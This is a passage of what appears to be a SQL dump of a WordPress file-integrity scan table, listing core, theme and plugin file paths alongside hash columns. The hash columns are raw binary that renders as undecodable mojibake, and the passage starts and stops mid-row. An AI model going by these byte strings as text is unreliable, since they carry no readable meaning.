','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�\"H�$V���j��','Ǝͱ�e\Z�����N�hԊ_���.����A','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<Ya��g�v��U�C','�K����d�����Sj`ݝ���G�`���#�','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N� ��P�{��','',0,'?'),('���J���K<V\\�|','wp-content/themes/sg-window/inc/widget-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��}��i�2�<PU�','�dӃ�Nݭ8���4B���+]&�6!��m[�','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('�� e�\r�9����\n','wp-content/themes/pine/inc/admin-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a2����N�B�O�','+��7�k��,��y���ڞj\"%���Z\"XjlI\'','',0,'?'),('����:��!>��l�','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',0,'�ۓ���G�c,��=c^�','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�.tX��尯^:`E��*','wp-content/themes/gambit/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SnA�?եUS��D�V�','兤gyƷʼ����w�Sn��&���r�=�','',0,'?'),('�7(���R�1����R','wp-includes/wp-includes/js/dist/dom.js',0,'ϗL\'n��f\\��FFE','ϗL\'n��f\\��FFE','�[J`aq�ݭNc�;���eȜR��\Z�p.�','',0,'?'),('�>��C:T��Hv�1�','wp-content/themes/Kent/FT/js/jquery.minicolors.min.js',0,'\n�-�0��IBg���~','\n�-�0��IBg���~','+�K*�>����^�ƕۏ�f�W�F\rq#��x�','',0,'?'),('�AALn�|[:��?�N@�','wp-content/themes/hueman/assets/czr/css/customizer-czr-text-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɛ�0c� :O��','�l$�Y��s+��=O\\�g$�53��l\r��re�','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�O�I�����Iԥ{','9YZ��A}7�=��:�\'Fo�G�\'�R�ɹ�_-','',0,'?'),('�Hej�l�E�9$�','wp-includes/wp-includes/user.php',0,'�λ���4S�����','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('�Myt}Uc8���O�','wp-includes/wp-includes/js/plupload/handlers.js',0,'O�� �~�5��8�ͫ;�','O�� �~�5��8�ͫ;�','� �\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'M�Tv�\Z\Z�zTdũCx','M�Tv�\Z\Z�zTdũCx','��6��:���_�/���Z�kz\n�j=�K�\r�:','',0,'?'),('�W�gcxu>��W�','wp-content/themes/pine/css/color-purple.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q*��4�[ �s١Y','uSz����͆YC�u8�����E�0�\n\Z�Tw\"7','',0,'?'),('�[�:�S���h ˸�','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<1����!\0�o��','#@^�=}l5�@���W���sa� #a� ��V','',0,'?'),('�`�W�^o �s�r��','wp-content/themes/wp-barrister/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�:3�t��QQ�q','6yI��E�\Z���D���\n��[�]Ŵ��M','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��A��a�<�ά','�9ti?L\r���E��-,�*���<�a\\=�i�a','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�~_کk_�l\n��','�vC.z-�N�Y��� �C�<����ccl','',0,'?'),('�s�G������S4�','wp-content/plugins/wp-cerber/assets/flags/ca.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�1���I��;pl�s�','��Bx���zU�O.�.t��XB�@ͤ��%��','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�܀ ���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('�|�UG��+A�\\d�ݜA','wp-content/themes/newsmag/assets/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�u���\Z_Q','��m�q��\\mԋ6�UNm<Yt�v�sI�EP','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�K�|��pB��w�k','wp-includes/wp-includes/js/jquery/ui/effect-bounce.js',0,'�;B� ��GYQ�n�ߴ','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('Ӂ�l-��y4Ngp0','wp-content/themes/twentytwentyone/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�F\ZLO�k:�','Z�8��!!�P���8~�\0����e��h','',0,'?'),('Ӎf�w�����Ձ�%','wp-content/themes/maxbusiness/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���VD��i��w','��Q}|��&\0&�Lu���Q�ɪ�n�B��G�','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӣ<i�9-^��@� �{�','wp-includes/wp-includes/js/admin-bar.min.js',0,'�၈��n�&�a1a\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�D�P�y��n�\\B�','�AQY��tQ�aK hˤ�+\r�+�x,`�','',0,'?'),('ӭ����|����z`\\�','wp-includes/wp-includes/images/smilies/icon_evil.gif',0,'�^��M�>�z��','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('Ӱ�@p���� 5x�P','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��;��MS�\nQd�ڇ','&жd�I�I��2�8!�.!�е�̼���u�','',0,'?'),('��F�aΕ�9s�$O','wp-content/themes/Yegor/404.php',0,'\"��3���8+��枯n','\"��3���8+��枯n','C�c��z���|�Y��F��D�z\'���Wײ#�','',0,'?'),('�Ҡ�5�������i*Ǡ','wp-content/plugins/wp-cerber/assets/flags/ms.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֠��G/�������Ҳ','�cZ��/�n�[�`��=\Z4�~��+�)%�k�','',0,'?'),('��>Zb�o&����','wp-content/plugins/akismet/views/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ܥ&F�e@`','ۑ�&\Z錷�ې7�~�����rb�','',0,'?'),('���^��\\�ɼZ��}1�','wp-content/themes/kidzoo-lite/css/kidzoo.color.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��_��XW~>b��','wp-content/themes/advance/inc/kirki/assets/js/controls/preset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��N�4o�w����','�����C��X���c���L����h�T4jj','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^g�v~�9Qu�i�\r�','+���ƱO�N6���,�F���]�ڷ�O��/','',0,'?'),('�w� ���v�M�z','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���K$�N�{�E� ','z6�Up�^$(J,m]��y�v*�(��\r�t�','',0,'?'),('��K��7ڋ����+','wp-content/themes/sg-window/img/0.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ٴ ?������','bz#���ht�7Z���}S�u`�Ł��/','',0,'?'),('�\n}l�uxR�i�&��','wp-includes/wp-includes/js/dist/vendor/moment.min.js',0,'d\"��\"M��aM�w�M','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�A�J����\Z�UIFː','wp-content/themes/hueman/assets/czr/css/customizer-czr-text-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�c�w�q���4�@','*+��X��&����a�\Z��.�m�Z<�f','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�<H5�����f�lۑ�','wp-content/themes/event/inc/front-page/upcoming-event.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�W2�qOV4 6\0�U�','�\"|�{�8����ƭ���?�����2�/�','',0,'?'),('�A��l�an���=3p�','wp-includes/wp-includes/images/crystal/text.png',0,'�� Ѳ��#�d�%�[�','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�].�oo�ȦM-n �','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S����Y����S`','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Tf������','��`�<���DadXjM� <��\r[j�ߕA�m','',0,'?'),('�xE����8���8�I','wp-content/themes/vision-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��\r��!�aL�Ɖ','���3٘�����5!i�����U9�V�c\rG','',0,'?'),('�~�7W��`K)�y�\0','wp-includes/wp-includes/meta.php',0,'�6y��w���N�ш','�6y��w���N�ш','���W!�\Zس-�Y��}����M��W�e?','',0,'?'),('Ԅq�#�w��!P��\Z��','wp-content/themes/vision-lite/customize-pro/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m.8i��~�|v۞','U4Y��6�5��T�8�dۆqD0g�Z$T֔:','',0,'?'),('Ԇ�p����!K\'�g�','wp-content/themes/Yegor/FT/FT_scope.php',0,'㉃�q�B3v��u.��','㉃�q�B3v��u.��','�h��G+L�&\'AG-G2�n~�H�\rh���','',0,'?'),('Ԋ�\0T,��`��G��','wp-content/themes/advance/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#i�-J�9�;�Yn��V','\\o��Ԁ3o��F��0fg[\r�x8ȵ�E��oc','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�P=C�g �\'L�','g��G�a$�E������˘UQbyħ�+','',0,'?'),('Ԡ��x�T��FXqO�','wp-content/themes/hueman/option-tree/assets/js/ot-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E8U��J�}�.�%w_�','�Ҁ���)�,�1�w$� ���hQ�a�����','',0,'?'),('Ի�K��\Z��y`mQ �','wp-includes/wp-includes/class-wp-admin-bar.php',0,'�~�;1�q�h��Nu�','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('���xP�i�*�s�U�y','wp-content/themes/spidermag/spidermag/customizer/additional-section/additional-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�5.t�F�E�`','�X��1M\04�ف���No�CP��0yt�̈��','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I ���g\0�����a�B','',0,'?'),('��ق,�4�ao���','wp-content/themes/storeone/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�*\0�v�EM���','%�Ҵ p��{��^sD�@V�X�!�����]M','',0,'?'),('��=�S�a/0O\"㐏S�','wp-content/themes/advance/inc/kirki/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�]�\n$�`cz~��','��5F���Si� ^ ��Z~�D�&�In����','',0,'?'),('��ƭ�Z���t�k�4#�','wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��Mf<M�!���fp�','U�٩�M�)ud\nrDl8ދ�+�VV\"6�C�>��}','',0,'?'),('��?�`��XL��f','wp-content/themes/event/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��3��m��ď��<',']��xp�8�X�uEwa[�=�;��Z�p���2�','',0,'?'),('��gjGA��V�\0�','wp-includes/wp-includes/js/twemoji.min.js',0,'���װ�aL/S��T','���װ�aL/S��T','e�dimԺm\Z$V��v�% ���FO��aK\rŇS','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;� KAH9Q�@� ����B~�','',0,'?'),('������IE��','wp-content/themes/sg-window/img/icons/small/livejournal.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʡ��\r��\"E��','���>T\0S=�L.E��?����%���k��','',0,'?'),('�q\'�X�|�\n�F��','wp-content/themes/promote/inc/kirki/includes/class-kirki-fonts-google.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\05���J����X���','�>&�uS��ťv+�H�v\\~�0���([N|�hp','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝ̢����VN3����','cm[Tl5����Qy;��w0��N!<��/躬�','',0,'?'),('�\Z3 b�ws0{/!Bm�','wp-content/plugins/wp-cerber/assets/flags/lu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#x�I���@K���','��f\0�4����;)��x�6ҽՖx�&X��w�v','',0,'?'),('��2B��4��Y1','wp-content/themes/newsmag/assets/vendors/machothemes/components/sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`����h.NQW� S','!�;�}�Τ�\'���期���s��=�bQ�','',0,'?'),('�%f��G���Pѣ��','wp-content/themes/twentytwenty/singular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9�&)e�k�i','�^��~��1o�U���K�����?[�*����','',0,'?'),('�\'����c�\n`�','wp-content/themes/gambit/inc/addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ֶq�f���j��K','��˹x����8Eid,V�y�}��7�5�+����6','',0,'?'),('�0�8E{8_�P�`�� ','wp-includes/wp-includes/js/dist/html-entities.min.js',0,'x�l��m7��#��F','x�l��m7��#��F','�z�d��q�ٻ�ٿ��� l���w�5�M�','',0,'?'),('�9�,Mt1S��ӭ�V�','wp-content/themes/gambit/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nBI݂\'��o�\n,��','%�8o�D[�]M�]��X+�J7�]�[�z','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE� ���','',0,'?'),('�G�h˲�;��\'ݷ�/','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j|�ZY����P','���:.P��BIP��i�l�� 9h��� �j� ','',0,'?'),('�V�.�S��aT{�â','wp-content/themes/pine/CHANGELOG.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z����k|Z����','D��i:���,e, ��͎p��e�j��H�s�','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ot�]�����',' [� ��G9<b*d}\r<���k�����\n��6��','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�E\"�LL��Z�R�D','�l�z<jW���Jzh��OKG����ğ�e�','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('�y-���-�Zb2��W�','wp-content/themes/cactus/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ho=\"���A�w','��c���\n���BhJύ�d�ӕ9p���N6�f','',0,'?'),('Հ�������b��|�','wp-content/themes/promote/inc/kirki/includes/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%���ª㚕�ψ]��','�?�[!��P��D���ꎶ\n>�\0���','',0,'?'),('Մ\\��&�e��6','wp-content/themes/promote/inc/kirki/includes/class-kirki-scripts-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<CX-�脄�eg�h`','+��W�<J�&�Fy�MRő���e���X','',0,'?'),('Ն/�F�>dd�Gm�','wp-content/themes/Endolf/inc/category-news-widget.php',0,'v� (c.�jD7��$�','v� (c.�jD7��$�','s6�qSa�8�8�,_G�z��|(�˱ +y��P','',0,'?'),('Շ\n!B|rC����','wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php',0,'<�\0W>$����l�^ҳ','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('Ջ���ָ^Rj��ś','wp-content/themes/sg-window/page-templates/right-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��day���n�Q�','k���N����%���~��DQ�5� �u�U�� ','',0,'?'),('ՙ�5qV��#Y�','wp-content/plugins/wp-cerber/assets/flags/ro.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�N����C�Eѩ-�','�J7d[�^k`�\0v�?ł�;%`a[)','',0,'?'),('է�C/��{�#�a','wp-content/themes/fastblog/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+ �)�=�T^~���5','j�ݳ�^�1�\0@��\"%k���<���۬��V_','',0,'?'),('յ0�\re�6b:��Q&��','wp-content/themes/newsmag/assets/sass/modules/_breadcrumbs.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']z2�e.�k���-�','���Q���ׄjN���&Vie\'�l���0�r��','',0,'?'),('վ7��y��Rݟ����','wp-content/themes/showcase-lite/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1v�ͅ:z��>����','�#ݤ����Qm|�d�oX5Y�L�:�e�[��F�x','',0,'?'),('���)�BZ�IŐ��Ra','wp-content/themes/hueman/assets/admin/img/col-3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I*[]�e���n�',']��^�/|L|�Ʋ���KXuN4���~7�\'�','',0,'?'),('���$ =:��Ƕ�Q:','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Әȵ �_8�Q3��','�u3{#\'r=MY,��k��ڎ\0��R�tY��','',0,'?'),('�ՏC݀�Q)�8��8�','wp-includes/wp-includes/Requests/Hooker.php',0,'�@%�a[ў/4��','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('�`�+Ci|�0�Lm�','wp-content/themes/promote/inc/kirki/includes/class-kirki-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�y�䦦���*i�','��~�S��j���,F�tn��� pqk�=o�?�','',0,'?'),('���Xx�h�@S_o0��','wp-content/themes/wp-barrister/library/images/favicon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\Zk/f�A}�','x��\"�\Z��\r��0����Y�ӱ7��?�','',0,'?'),('��1�*Ui[�8�^�=','wp-includes/wp-includes/class-walker-comment.php',0,'I#�h�Z~�����@��','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('�R�|1�cr)��*','wp-includes/wp-includes/js/admin-bar.js',0,'�\r�c����@p�','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('�C\Z�9�9\Z�1B�','wp-content/themes/anima/admin/images/logo-customizer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�]��F2儾�T�5','l(e�ς\'�r��L]��) wG�2�B���o%p�','',0,'?'),('��}��m��Wd,���','wp-content/themes/weblog/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1}�͈��(�p��VKu','f���r���Kv{e��B�n�4t��q^d�\'','',0,'?'),('�!V������<k�,o�','wp-content/themes/sg-window/functions.php',0,'B��-���˨��8','B��-���˨��8','�Ŧ5I�P�����6v�(Li��)�&Q�d�0H','',0,'?'),('�\'{��K�6#�w�=-','wp-content/themes/spidermag/spidermag/customizer/design-section/design-layouts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VL��\Z�CPc��Uq�_\r','N�A=���S�#B\\}��4lM���6f���?��\r','',0,'?'),('�<������$�h�','wp-includes/wp-includes/js/jquery/jquery.masonry.min.js',0,'��@`���&n|�}A��','��@`���&n|�}A��','�\\ۙ���� }M�g� �$�0� [���B','',0,'?'),('�K9�\'���\r�H<���','wp-content/themes/advance/inc/kirki/kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�Z���V�b�We�','W\nk����`ֻ��`�]4�����W:>�B7�','',0,'?'),('�K�М?���Qdӛ]&','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�{\r�֒����5','5j��\ZC̀M�Oò6��>��MXHH�i�A','',0,'?'),('�Nk�,��.���-c��','wp-content/themes/hueman/functions/class-utils-settings-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V;�7�;m�_�b(�','#AͧX�H�*�Ͳ\06�q�՝D+@p����','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z� r!ޏf��� �','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('�t�Q��oi�:��\r�','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',0,'\'�U巃�� qD�F��H','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�v��&�M�|=��h`�','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js',0,'El�*Ie��NZ�aK��','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s `�A���;�y_���<��X�\Z�%Y�','',0,'?'),('��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~���4��','',0,'?'),('֤ɕXD����dq','wp-includes/wp-includes/SimplePie/Registry.php',0,'���\\���S8�X�`Yt','���\\���S8�X�`Yt','5\n֚�8��q�W��@��C�HҘ���\\eg','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('ֿ�PХ��l�H�/Й�','wp-includes/wp-includes/js/dist/block-library.js',0,'�INo<�Rz�I����','�INo<�Rz�I����','�Op�2�j�|:,��a:�weҽ�H�S�/�.','',0,'?'),('��V�i�T?�g','wp-content/themes/travel-stories/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�=x�߅,�aH�6��','�u�Yuc�Nɦr��/h`\n}�u��rl_�<�','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���-[�\0:�&��','',0,'?'),('���B��W���k\rZ{��','wp-includes/sodium_compat/lib/ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5\\S���z���','�\0h���=�`]U3�g��殼4%1��9x�*�','',0,'?'),('��<��b�XUM�@\\!','wp-content/plugins/wp-cerber/assets/flags/pt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��,t7s\'��=K^','qd<Q\Z�fe�-� %�7��5[�1�+i�uG�','',0,'?'),('��ײl.#)iD���','wp-content/themes/sg-window/img/icons/small/digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�һ���C =�','�,���5�]+��l�,��n@���A1B�:���','',0,'?'),('��G�����l�j,�','wp-content/themes/kidzoo-lite/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�m�)gj�!r�T�8',',�_��Ц���?t�/*8��`ϋ�nRG�@','',0,'?'),('���y\"���=]�4�','wp-includes/wp-includes/js/autosave.js',0,'\0|w{���5l�D\nө��','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('�[O��mT�G�P�','wp-content/themes/auberge/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�s�|��s�]_� d','��0�Cyo�@V˽[�\r�1�M� \0\Z~e��� 